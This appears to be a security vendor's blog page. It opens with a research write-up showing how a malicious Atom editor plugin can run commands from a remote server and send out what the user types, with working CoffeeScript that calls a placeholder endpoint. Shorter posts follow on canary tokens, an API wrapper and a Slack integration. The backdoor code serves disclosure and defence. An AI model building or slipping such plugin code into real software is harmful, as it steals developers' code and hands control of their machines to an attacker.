All your devs are belong to us: how to backdoor the Atom editor

This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at a way to compromise your developers that you probably aren't defending against: exploiting the plugins in their editors. We'll explore Atom, its plugins, how they work, and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, that's even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But when it comes to choosing an editor, everyone has their own views. Some prefer modern editors like Atom or Sublime, while others are more die-hard/old-school and prefer to stick to Vim or Emacs. Whatever you choose, you'll most likely want to customize it in some way (if not, I'm not sure I can trust you as a person, let alone a developer).

Plugins and extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc.), they also offer a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever-growing list of them (because who has the time to go back and delete old unused plugins?). Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, GitHub's shiny new editor. According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with its vast selection of packages. You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple of hours I had not only published my first package, but had updated it to include a little bit of malicious code too.

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required, and how difficult would it be (would our package need to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package, you'd first create a useful non-malicious one to build a large user base, and then push an update that injects the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package 

This will give you a package with a simple toggle method that we will use later:

toggle: ->
    console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
    console.log 'touch-type-teacher was toggled!'
    console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's steps one and two done, showing how easy it is to publish and update a package. The next step was to see what could actually be done with it.


That seems like a reasonable request

Step Three

Seeing as packages are built on Node.js, the initial test was to see which modules we had access to.

The request package seemed like a good place to start, as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>            
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
    {spawn} = require 'child_process'
    test = spawn 'whoami'
    test.stdout.on 'data', (data) ->
        request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
            console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's have our endpoint send commands to run dynamically! And while we're at it, instead of only firing when our package is toggled, let's fire whenever a key is pressed.

First we'll need to hook into the onDidChange event of the current editor:

module.exports = TouchTypeTeacher =
  touchTypeTeacherView: null
  modalPanel: null
  subscriptions: null
  editor: null

  activate: (state) ->
    @touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
    @modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
    @editor = atom.workspace.getActiveTextEditor()
    @subscriptions = new CompositeDisposable

    @subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle': => @toggle()
    @subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data=' + @editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
        test = spawn body
        console.log 'External code to run:\n' + body
        test.stdout.on 'data', (data) ->
            console.log 'sending output'
            request 'http://my-remote-endpoint.com/run?data=' + data.toString().trim(), (error, response, body) =>
                console.log 'output sent!'

What happens in this code snippet is a bit of overkill, but it demonstrates our point. On every change in the editor we send the editor's text to our endpoint, which in turn returns a new command to execute. We run the command and send its output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.

[Video: the user types into the editor on the left, while the logs on our remote server appear on the right]


Our little plugin is not going to be doing global damage anytime soon. In fact, we unpublished it once our tests were done. But what if someone changed an existing plugin with lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it emerged that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior, and had promoted the use of Kite over the open source alternative.

Once this was discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent), in the past week it was reported that two Chrome extensions had been taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victim to the same phishing attack. Details of the events can be read here (Web Developer) and here (Copyfish), but the gist of it is that popular Chrome extensions were compromised and their users fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being flagged as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us from stealing all the information the user has access to. Even if some kind of code analysis were conducted on uploaded code, it's possible to remotely eval() code at runtime. Automatic updates mean that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but if the channel is not controlled, it's getting more and more difficult to secure.



BlackHat 2017 Series

[Update: jump to the end of the page for the series index]

Late July found Haroon and me sweating buckets inside an 8th-storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slide deck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing.


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing it chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience, we took another crack at Cloud security.


The main thrust this time is that security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs, and show simple examples of how insignificant issues in third parties boomerang into large headaches. We talk software supply chains for your developers, through malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and we go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesc, persistence and logging disruption. Lastly, we take an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss not to mention Atlassian's Daniel Grzelak, who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition, as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS; it's one of 74 possible services you can run there.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor

A guide to Birding (aka: Tips for deploying Canaries)

Here's a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they're quick to deploy (under 5 minutes from the moment you unbox them), but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here (No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on Twitter: @thinkstCanary.

Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened, an attempt to fetch the resource is made. This request tickles the token server, which leads to you being notified.

Because so many of us store content on Google Drive, we wanted to do something similar with Google Documents and Google Sheets. The embedded-image approach was possible in Google Sheets; however, image caching coupled with weak API support for Google Documents pushed us towards Google Apps Script.

Google Apps Script is a powerful JavaScript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

Apps Script files can be published in three different ways:

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create your own API endpoints to be used by a client application).

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document;
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent via an HTTP request, notifying the document owner.

A more detailed outline of each feature is given below.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.
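As a taste, installable triggers can also be created in code rather than through the UI. A minimal sketch (here "notify" is the handler function we define below):

ScriptApp.newTrigger('notify')
    .forSpreadsheet(SpreadsheetApp.getActive())  // bind to the current spreadsheet
    .onOpen()                                    // fire each time it is opened
    .create();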

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. It was used to send the requests needed to notify the document owner that the tokened document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use hookbin for convenience. 


Write a function which sends user information to an endpoint
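A minimal sketch of such a function, assuming a Hookbin endpoint (swap in your own bin URL; the payload field names are just illustrative):

function notify() {
  // Gather details about whoever just opened the document
  var payload = {
    owner: Session.getEffectiveUser().getEmail(),  // the trigger installer, i.e. the document owner
    viewer: Session.getActiveUser().getEmail(),    // the user opening the document
    locale: Session.getActiveUserLocale()
  };
  // POST the viewer's details to our endpoint
  UrlFetchApp.fetch('https://hookb.in/REPLACE_ME', {
    method: 'post',
    payload: payload
  });
}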


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin), the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted, all that remains is for the document to be shared. You can share the document with specific people or with anyone on the internet. The only caveat is that the document needs to be shared with EDIT permissions or else the script will not function correctly.

Every time the document is opened, POST requests will be sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy any previously installed triggers. Thus, the user the document was shared with would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete or edit the script and/or document.

We overcame this through some creativity and elbow grease.

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product, you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

Introducing our Python API Wrapper



With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? First you'll need to install our package. You can grab it from a number of places, or simply start up your favourite shell and run "pip install canarytools".
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 
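In its simplest form that's a two-liner (a sketch; swap in your own values):

import canarytools

# API_KEY and CLIENT_DOMAIN come from your Console, as described below
console = canarytools.Console(api_key='API_KEY', domain='CLIENT_DOMAIN')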


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in front of "canary.tools" in your Console's URL. For example, in https://testconsole.canary.tools/settings, "testconsole" is the domain.

Alternatively, a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current User}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab it from the Canary Console API tab under Console Setup (this is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash shell? No problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:
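Something like the following (a sketch; check the wrapper docs for exact signatures):

devices = console.devices.all()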

From here it is straightforward to do things such as update all your devices, or even reboot them:
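Roughly (the method names here are our recollection of the wrapper's API; double-check against the documentation):

for device in console.devices.all():
    device.update()  # kick off a device update
    device.reboot()  # ...or reboot it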

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of the incident is easy:
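For example (the attribute name is illustrative; see the docs for the exact incident fields):

for incident in console.incidents.all():
    print(incident.src_host)  # the source IP of the incident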

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:
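Along these lines (the node_id value and the older_than format are illustrative):

console.incidents.acknowledge(node_id='EXAMPLE_NODE_ID', older_than='3 weeks')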


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles (you can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens, simply call:
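A sketch, following the wrapper's style:

tokens = console.tokens.all()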

You can also create tokens:
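For instance (the token kind and memo are illustrative; consult the docs for the supported kinds):

token = console.tokens.create(
    kind=canarytools.CanaryTokenKinds.HTTP,
    memo='Link planted in the finance share')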


Enable/disable your tokens:
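A sketch:

token.disable()  # pause the token
token.enable()   # and bring it back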


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:
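A sketch (the method name is our best guess from the wrapper docs; the IP and port are illustrative):

console.settings.whitelist_ip_port('192.168.1.2', '5000')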


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programmatic) interactions with our birds a breeze.

Cloud Canary Beta

Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version 2 with a bunch of new features. You really should check it out.

Since almost day one, customers have been asking for virtual Canaries. We generally prefer doing one thing really well over doing multiple things "kinda OK", so we held off virtualising Canary for a long time. That changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries makes sense. Over the past couple of months we've been working to get Canaries virtualised, with an initial focus on Amazon's EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.

Slack[ing] off our notifications

We :heart: Slack. The elderly in our team were IRC die-hards, but Slack won even them over (if for no other reason than their awesome iOS changelogs).


Thanks to Slack integrations, its robust API and webhooks, we have data from all over filtering into our Slack, from exception reporting to sales enquiries. If it's something we need to know, we have it pushed through to Slack.


At the same time, our Canary product (which prides itself on helping you "Know. When it matters") was able to push out alerts via email, SMS or over its RESTful API. Canaries are designed from the ground up not to be loquacious, i.e. they don't talk much, but when they do, you should probably pay attention. Having them pipe their alerts into Slack seemed a no-brainer.


Our initial stab at this was simple: by allowing a user to enter the URL for a webhook in their Console, we could send events through to the Slack channel of their choosing.

[Screenshot: webhook configuration in the Canary Console]
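Under the hood, an incoming webhook is just an HTTP POST of a JSON payload to the webhook URL, something like the following (the URL is Slack's documented placeholder, and the alert text is illustrative):

curl -X POST -H 'Content-type: application/json' \
    --data '{"text": "Canary alert: port scan detected on bird FS01"}' \
    https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX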


Of course, this wasn’t all that was needed to this get working. The user would first have to create their webhook. Typically, this would require the user to:

Click on their team name, and navigate to Apps & Integrations


Hit the Slack apps page and navigate to "Build"


Be confused for a while before choosing “Make a custom integration”

Select “Incoming Webhooks”



At this point the user either:
  a. decides this is too much work and goes to watch Game of Thrones;
  b. goes to read the "Getting started" guide before going to [a];
  c. chooses a destination channel and clicks "Add Incoming Webhooks Integration".


After all this, the user’s reward is a page with way more options than is required for our needs (from a developer's point of view, the options are a delight and the documentation is super helpful, but for an end user... Oy vey!)

Finally... the user can grab the webhook URL, and insert it in the settings page of their console.

(This isn’t the most complicated thing ever... It’s not as confusing as trying to download the JDK - but Canary is supposed to make our users' lives easier, not drive them to drink)

With a bit of searching, we found the Slack Button.

[Add to Slack button]

This is Slack's way of allowing developers to make deploying integrations quick and painless. It means that our previous 8-step process (9 if you count watching Game of Thrones) becomes the following:

The user clicks on the "Add to Slack" button (above)

They are automatically directed to a page where they authorise the action (and choose a destination channel)



There is no step 3.



Of course, we do a little more work, to allow our users to easily add multiple integrations, but this is because we are pretty fanatical about what we do.

At the end of it though, 2 quick steps, and you too can have Canary goodness funnelled to one of your Slack channels!

[Screenshot: Canary alert posted to a Slack channel]

At the moment we simply use the incoming webhooks to post alerts into Slack, but there's lots of room to expand using slash commands or bot users, and we hear all the cool kids are building bots (aka: watch this space!).

P.S. If you are a client, visit /settings on your console to see the new functionality.